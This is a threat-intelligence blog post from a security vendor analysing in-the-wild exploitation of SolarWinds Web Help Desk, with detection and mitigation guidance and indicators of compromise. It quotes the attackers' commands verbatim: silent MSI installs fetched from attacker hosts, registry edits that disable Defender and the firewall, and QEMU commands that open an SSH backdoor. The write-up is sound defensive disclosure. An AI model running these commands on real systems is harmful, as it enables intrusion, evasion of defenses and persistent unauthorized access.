Don’t let overlooked obligations become incidents. Learn how.
Utility navigation bar redirect icon
Portal LoginSupportContact
Search
Close search
Huntress Logo in Teal
  • Platform Overview
    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed ITDR

    Protect your Microsoft 365 identities and email environments.

    Managed ITDR

    Protect your Microsoft 365 identities and email environments.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed Security Awareness Training

    Empower your teams with science-backed security awareness training.

    Managed Security Awareness Training

    Empower your teams with science-backed security awareness training.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Integrations
    Integrations
    Support Documentation
    Support Documentation
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
  • Threats We Stop
    Phishing
    Phishing
    Business Email Compromise
    Business Email Compromise
    Ransomware
    Ransomware
    Infostealers
    Infostealers
    View Allright arrowView Allright arrow
    Industries We Serve
    Education
    Education
    Financial Services
    Financial Services
    State and Local Government
    State and Local Government
    Healthcare
    Healthcare
    Law Firms
    Law Firms
    Manufacturing
    Manufacturing
    Utilities
    Utilities
    View Allright arrowView Allright arrow
    Tailored Solutions
    MSPs
    MSPs
    Resellers
    Resellers
    SMBs
    SMBs
    Compliance
    Compliance
    What Gets Overlooked Gets Exploited

    Most days, nothing happens. But one day, something will.

    Huntress Cybersecurity
    Cybercriminals Have Evolved

    Get the intel on today’s cybercriminal groups and learn how to protect yourself.

    Huntress Cybersecurity
  • Pricing
  • Community Series
    The Product Lab

    Shape the next big thing in cybersecurity together.

    The Product Lab

    Shape the next big thing in cybersecurity together.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    Resources
    Upcoming Events
    Upcoming Events
    Ebooks
    Ebooks
    On-Demand Webinars
    On-Demand Webinars
    Videos
    Videos
    Whitepapers
    Whitepapers
    Datasheets
    Datasheets
    Cybersecurity Education
    Cybersecurity 101
    Cybersecurity 101
    Cybersecurity Guides
    Cybersecurity Guides
    Threat Library
    Threat Library
    Real Tradecraft, Real Results
    Real Tradecraft, Real Results
    2026 Cyber Threat Report
    2026 Cyber Threat Report
    The Huntress Blog
    Huntress Lands on the Microsoft Marketplace
    Huntress Cybersecurity
    Huntress Lands on the Microsoft Marketplace
    Huntress Cybersecurity
    How Huntress & DEFCERT Are Streamlining CMMC Assessment Prep
    Huntress Cybersecurity
    How Huntress & DEFCERT Are Streamlining CMMC Assessment Prep
    Huntress Cybersecurity
    Live Hacking Into Microsoft 365 with Kyle Hanslovan
    Huntress Cybersecurity
    Live Hacking Into Microsoft 365 with Kyle Hanslovan
    Huntress Cybersecurity
  • Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    The Huntress SOC

    24/7 Security Operations Center

    The Huntress SOC

    24/7 Security Operations Center

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Community

    Get in touch with the Huntress Community team

    Community

    Get in touch with the Huntress Community team

    Compare Huntress
    Bitdefender
    Bitdefender
    Blackpoint
    Blackpoint
    Breach Secure Now!
    Breach Secure Now!
    Crowdstrike
    Crowdstrike
    Datto
    Datto
    SentinelOne
    SentinelOne
    Sophos
    Sophos
    Compare Allright arrowCompare Allright arrow
  • HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    Partners
    MSPs

    Join our partner community to deliver expert-led managed security.

    MSPs

    Join our partner community to deliver expert-led managed security.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Tech Alliances

    Driving innovation through global technology Partnerships

    Tech Alliances

    Driving innovation through global technology Partnerships

    Microsoft Partnership

    A Level-Up for Your Business Security

    Microsoft Partnership

    A Level-Up for Your Business Security

  • Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Awards
    Awards
    Contact Us
    Contact Us
  • Portal Login
  • Support
  • Contact
  • Search
  • Get a Demo
  • Start for Free
Portal LoginSupportContact
Search
Close search
Get a Demo
Start for Free
HomeBlog
Active Exploitation of SolarWinds Web Help Desk
Published:
February 8, 2026

Active Exploitation of SolarWinds Web Help Desk

By:
Anna Pham
John Hammond
Jamie Levy
Share icon
Glitch effectGlitch effectGlitch effect

Acknowledgments: Special thanks to Dipo Rodipe, Dray Agha, and Lindon Wass for their contributions to this investigation and write-up.


TL;DR: Huntress has observed threat actors exploiting SolarWinds Web Help Desk vulnerability across 3 customers; organizations should apply the update from SolarWinds’ website as soon as possible.


Background

On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Meetings and  Cloudflare tunnels for persistence, as well as Velociraptor for means of command and control.

This intrusion stemmed from the many recently disclosed vulnerabilities affecting SolarWinds WHD. The most critical vulnerabilities grant an adversary arbitrary code execution via untrusted deserialization -- CVE-2025-40551 was recently added to CISA’s Known Exploited Vulnerabilities database, and CVE-2025-26399 was just recently discussed by Microsoft and other vendors who have also observed active in-the-wild exploitation.

All previous versions of SolarWinds Web Help Desk prior to 12.8.7 HF1 are vulnerable to these vulnerabilities. You can find the version of your SolarWinds WHD at this path:

C:\Program Files\WebHelpDesk\version.txt

A view of SolarWinds Web Help Desk
Figure 1: A view of SolarWinds Web Help Desk


Across our partner base, Huntress protects 84 endpoints across 78 organizations using SolarWinds Web Help Desk.


Huntress observations

Zoho Assist, but make it malicious

Huntress observed active post-exploitation activity stemming from this compromised SolarWinds Web Help Desk (WHD) instance. 

The attack chain originated from wrapper.exe, the WHD service wrapper, which spawned java.exe, the underlying Tomcat-based WHD application. The Java process then launched cmd.exe to silently install a remote MSI payload via this command:

msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi

The adversary leveraged the file-hosting service Catbox to stage a Zoho ManageEngine RMM agent, a legitimate remote management tool that may be abused by threat actors to maintain persistent, hands-on access to the compromised environment. This activity aligns with Microsoft's February 6 advisory on active exploitation of SolarWinds Web Help Desk, confirming that threat actors are actively weaponizing WHD vulnerabilities to achieve remote code execution and deploy additional tooling in victim environments.

Interestingly, the Zoho Assist agent was configured for unattended access, registering the compromised host to a Zoho Assist account tied to a Proton Mail address, esmahyft@proton[.]me.

Once the Zoho ManageEngine RMM agent was established, the threat actor wasted no time pivoting to hands-on-keyboard activity. Using the RMM agent process (TOOLSIQ.EXE) as their operational foothold, they executed Active Directory discovery commands to enumerate domain-joined machines via net group "domain computers" /do, a textbook reconnaissance technique aimed at identifying viable targets for lateral movement.


Figure 2: Huntress detection of domain reconnaissance and MSI payload delivery spawned from the WHD service process (TOOLSIQ.EXE)

Shortly after the initial reconnaissance, the threat actor leveraged the Zoho Assist remote session to deploy Velociraptor, a legitimate open-source digital forensics and incident response (DFIR) tool, to the compromised host. The installation was performed via a silent MSI execution, pulling the installer from an attacker-controlled Supabase storage bucket:

msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi


Who's running Velociraptor? Not the Blue Team.

While Velociraptor is designed to help defenders with endpoint monitoring and artifact collection, its capabilities, such as remote command execution, file retrieval, and process execution via VQL queries, make it equally effective as a C2 framework when pointed at attacker-controlled infrastructure.

The uncovered Velociraptor configuration file had some interesting components:


Loading Gist...

This demonstrates the adversary using Velociraptor version 0.73.4, a known outdated version of Velociraptor with a privilege escalation vulnerability, which other vendors have also seen leveraged in previous campaigns.

The Velociraptor server URL, https://auth.qgtxtebl.workers[.]dev/, utilizes a Cloudflare Worker from the same Cloudflare account we have seen before across multiple intrusions involving ToolShell exploitation, and Warlock ransomware deployment, identified by the shared per-account identifier component of the subdomain: qgtxtebl.

With the Velociraptor agent installed as a Windows service, the threat actor began executing a rapid sequence of encoded PowerShell commands via the Velociraptor agent, all following the same execution pattern: powershell.exe -ExecutionPolicy Unrestricted -encodedCommand. This is consistent with Velociraptor's default method for executing PowerShell on endpoints, where commands are base64-encoded (UTF-16LE) to avoid issues with special characters and path escaping.


Hash check on VS code binary

The first command observed from the Velociraptor process was a hash verification of a file already present on disk:

Get-FileHash "C:\ProgramData\Microsoft\code.exe"

The threat actor later downloads code.exe to this same path from a Supabase storage bucket, suggesting this was a pre-check to determine whether the binary needed to be re-downloaded. The file path C:\ProgramData\Microsoft blends with legitimate Microsoft tooling on Windows systems.


Cloudflared installation

Shortly after, the threat actor installed Cloudflared directly from GitHub's official release URL:

msiexec /q /i hxxps://github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi

This establishes an additional tunnel-based channel alongside the existing Velociraptor C2 connection, giving the threat actor redundant access to the compromised host.


System reconnaissance exfiltration to Elastic Cloud

This is where things get interesting. Just three seconds into the sequence, the threat actor executed a PowerShell script that collects comprehensive system information and ships it directly to an attacker-controlled Elastic Cloud instance:


Loading Gist...
The script runs the PowerShell cmdlet Get-ComputerInfo, which returns detailed system information, including OS version, hardware specifications, domain membership, installed hotfixes, and more. It then formats the output as NDJSON and pushes it to an Elasticsearch systeminfo index via the Bulk API using a hardcoded API key.

The use of Elastic Cloud as a data collection backend is a notable tradecraft choice. The attacker provisioned their own Elastic Cloud free trial deployment on Elastic's legitimate SaaS infrastructure hosted on GCP. In an ironic twist, the threat actor essentially built themselves a SIEM, using Elastic, no less -- to triage their victims. Every compromised host phones home with its full system profile to a centralized Elasticsearch instance that the operator can query, filter, and sort at scale through Kibana. Elastic's own tooling, typically used by defenders for threat hunting and incident response, was repurposed as an attacker's victim management dashboard.

We have reported this malicious instance to Elastic as well as law enforcement and performed victim notification and outreach to non-Huntress partners. Following our coordination and collaboration efforts, we hope to soon share a “Part 2” of this write-up with further details on the threat actor’s infrastructure and malicious activity.


Disabling Windows Defender and Windows Firewall

After a roughly 84-second gap, the threat actor turned to disabling security controls via registry modifications:

  • reg add "HKLM\SYSTEM\CurrentControlSet\Services\mpssvc" /v Start /t REG_DWORD /d 4 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOAVProtection /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealTimeMonitoring /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f


VS Code tunnel binary download from Supabase

Approximately a second after disabling Defender, the threat actor downloaded a fresh copy of the VS Code binary:


Loading Gist...
This is interesting in context: the first command in the chain had already verified an existing code.exe at the same path via Get-FileHash. The threat actor appears to check the pre-staged copy first, then downloads a fresh copy after Defender has been disabled. While the threat actor didn’t actually use code.exe, it’s possible that they downloaded it in case they needed to use it for tunneling as was seen in prior incidents that also happened to use Velociraptor.


C2 failover mechanism

This is arguably one of the most operationally interesting commands in the entire chain. Executed at the same timestamp as the VS Code download, this script implements a live C2 failover mechanism for the Velociraptor agent:


Loading Gist...

The script probes v2-api.mooo[.]com at the /reader endpoint. If the server responds with an HTTP 406 (Not Acceptable) status code, the script rewrites the Velociraptor client.config.yaml on disk, replacing the current C2 domain auth.qgtxtebl.workers[.]dev with v2-api.mooo[.]com, and restarts the Velociraptor service to pick up the new configuration. 

This is signal-based C2 migration: the HTTP 406 acts as a trigger from the operator indicating “the worker.dev domain is burned, and to switch to the backup”. If the endpoint returns anything other than a 406, or is unreachable, the config stays unchanged and Velociraptor continues communicating with the original Cloudflare Workers domain. This gives the operator the ability to dynamically rotate C2 infrastructure across their entire fleet of compromised hosts by simply toggling the HTTP response code on the failover server.

System information collection

The final reconnaissance command in the sequence was a straightforward systeminfo command execution, likely as a secondary collection method or a redundancy measure in case the earlier PowerShell-based Elastic Cloud exfiltration did not succeed.

Velociraptor service restart

The last event observed in this chain was the Velociraptor service restarting at 12:38:41 UTC, consistent with the C2 failover script calling Restart-Service Velociraptor -Force: 

C:\Program Files\Velociraptor\Velociraptor.exe  --config "C:\Program Files\Velociraptor\/client.config.yaml" service run


Persistence using QEMU

We also found instances where victim machines had the tell-tale signs of compromise as seen in earlier reports involving a scheduled task named TPMProfiler.  While there are legitimate tasks that start with “TPM” (like Trusted Platform Module), this particular name is only seen as malicious across all endpoints we have seen.  

Each of these scheduled tasks had made use of QEMU to open an SSH backdoor as a persistence mechanism. In one case, QEMU was no longer on the machine, which came in compromised. It is unclear if the attacker cleaned up after themselves, or if that part of the attack was just unsuccessful in general.  The earliest known instance of this persistence mechanism was installed on January 16, 2026, at 21:24:40 UTC. This can give us a potential timeline of when these attacks may have actually begun.

Figure 3: Example of the TPMProfiler Scheduled Task

While there were multiple components of this intrusion and investigation, below is a visual timeline of the observed threat actor activity.


Figure 4: Timeline of the attacker’s activities
 



Mitigation guidance

To better protect your organization against SolarWinds Web Help Desk exploitation, we strongly recommend the following:

  • Update SolarWinds Web Help Desk to version 2026.1 or later, which addresses CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551. All prior versions should be considered vulnerable. See the SolarWinds upgrade guide for instructions.

  • WHD administrative interfaces should not be publicly accessible. Place WHD behind a VPN or firewall and remove direct internet access to admin paths.

  • Reset passwords for all service accounts, administrator accounts, and any credentials accessible through or stored within the WHD application.

  • Review WHD hosts for unauthorized remote access tools (Zoho Assist, Velociraptor, Cloudflared, VS Code tunnels), unexpected services, encoded PowerShell execution, and silent MSI installations spawned by the WHD service process (java.exe / wrapper.exe).


What is Huntress doing?

Huntress has detections in place to identify post-exploitation activity stemming from compromised SolarWinds Web Help Desk instances. Huntress continues to actively monitor for this threat across our partner base.

Additionally, we have prepared a Knowledge Base article with the quick facts for you to share with your teams.


Sigma 

Relevant Sigma rules for detecting this type of activity may be found in our Threat Intel GitHub repository. Gists have also been supplied for convenience:


Loading Gist...


Loading Gist...


Indicators of compromise (IOCs)

Item

Description

https://files.catbox[.]moe/tmp9fc.msi


SHA256:

897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189

Zoho Meetings Installer

https://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi


SHA256:

46831be6e577e3120084ee992168cca5af2047d4a08e3fd67ecd90396393b751


Velociraptor Installer

https://auth.qgtxtebl.workers[.]dev/

Velociraptor Server URL

https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi

Cloudfared Installer

https://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/code.txt


C:\ProgramData\Microsoft\code.exe


SHA256:

34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4

Portable version of VSCode

esmahyft@proton[.]me

Zoho Assist Account Email

v2-api.mooo[.]com

Velociraptor Failover Domain

client.config.yaml

SHA256:

bbd6e120bf55309141f75c85cc94455b1337a1a4333f6868b245b2edfa97ef44

Velociraptor Config File

Task Path:

C:\Windows\System32\Tasks\TPMProfiler


Command:

C:\Users\[user]\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22

Scheduled Task (persistence)



Task Path:

C:\Windows\System32\Tasks\TPMProfiler


Command:

C:\Users\[user]\local\qemu-system-x86_64 -m 1G -smp 1 -hda bisrv.dll -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::32567-:22

Scheduled Task (persistence)



Categories
Response to Incidents
Summarize this postClose Speech Bubble
ChatGPTClaudePerplexityGoogle AI

See Huntress in action

Our platform combines a suite of powerful managed detection and response tools for endpoints and Microsoft 365 identities, science-backed security awareness training, and the expertise of our 24/7 Security Operations Center (SOC).

Book a Demo
Share
Facebook iconTwitter X iconLinkedin iconDownload icon
Glitch effect

You Might Also Like

  • Someone Else’s SIEM: A Threat Actor Abuses Another Free Trial

    A deep dive into a threat actor who exploited SolarWinds Web Help Desk, abused an Elastic Cloud SIEM free trial for exfiltration and triage, revealing key infrastructure.
  • Velociraptor Misuse, Pt. II: The Eye of the Storm

    Huntress reports an uptick in threat actors abusing the Velociraptor open-source DFIR tool, linked to incidents involving WSUS exploitation, VS Code tunnels, and more.
  • Threat Advisory: Hackers Are Exploiting CVE-2021-40444

    Huntress is monitoring a new threat against Windows OS and Microsoft Office products (CVE-2021-40444). The MSHTML engine is vulnerable to arbitrary code execution.
  • The Commented Kill Chain: Why Old Ransomware Playbooks Never Die

    When a clearly commented script revealed an attacker's tactics, Huntress prevented encryption. Read on to learn more about the evolution of recycled ransomware playbooks used by multiple threat actors.
  • Akira Ransomware Indicators

    Tracking various indicators associated with different attacks, Huntress analysts have been able to identify specific indicators (threat actor workstation names, passwords associated with new user account creation or current account modification, CloudFlare tunnel tokens) that are associated with Akira ransomware infections. By detecting these indicators much earlier in the attack chain, organizations can inhibit or even obviate file encryption malware deployment.
  • “Advanced” Intrusion Targeting Executive at Critical Marketing Research Company

    An intrusion at a market research company used living-off-the-land techniques, but Huntress detected and mitigated the threat, uncovering tactics like service creation and registry manipulation. Learn more and get detection guidance and mitigation strategies.
  • Velociraptor Misuse, Pt. I: WSUS-Up?

    Huntress has seen an uptick in threat actors abusing the Velociraptor open-source DFIR tool in a range of attacks, including a recent incident involving WSUS exploitation.
  • DE&TH to Vulnerabilities: Huntress Catches SmarterMail Account Takeover Leading to RCE

    SmarterMail versions prior to Build 9511 are vulnerable to privileged account takeover and remote code execution. Learn more about the latest Huntress DE&TH Team’s findings.

Sign Up for Huntress Updates

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
Privacy • Terms
By submitting this form, you accept our Terms of Service & Privacy Policy
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Huntress Managed Security PlatformManaged EDRManaged EDR for macOSManaged EDR for LinuxManaged ITDRManaged SIEMManaged Security Awareness TrainingManaged ISPMManaged ESPMBook a Demo
PhishingComplianceBusiness Email CompromiseEducationFinanceHealthcareManufacturingState & Local Government
Managed Service ProvidersResellersIT & Security Teams24/7 SOCCase Studies
BlogResource CenterCybersecurity 101Upcoming EventsSupport Documentation
Our CompanyLeadershipNews & PressCareersContact Us
Huntress white logo

Protecting 215k+ customers like you with enterprise-grade protection.

Privacy PolicyCookie PolicyTerms of UseCookie Consent
Linkedin iconTwitter X iconYouTube iconInstagram icon
© 2025 Huntress All Rights Reserved.

Join the Hunt

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.

By submitting this form, you accept our Terms of Service & Privacy Policy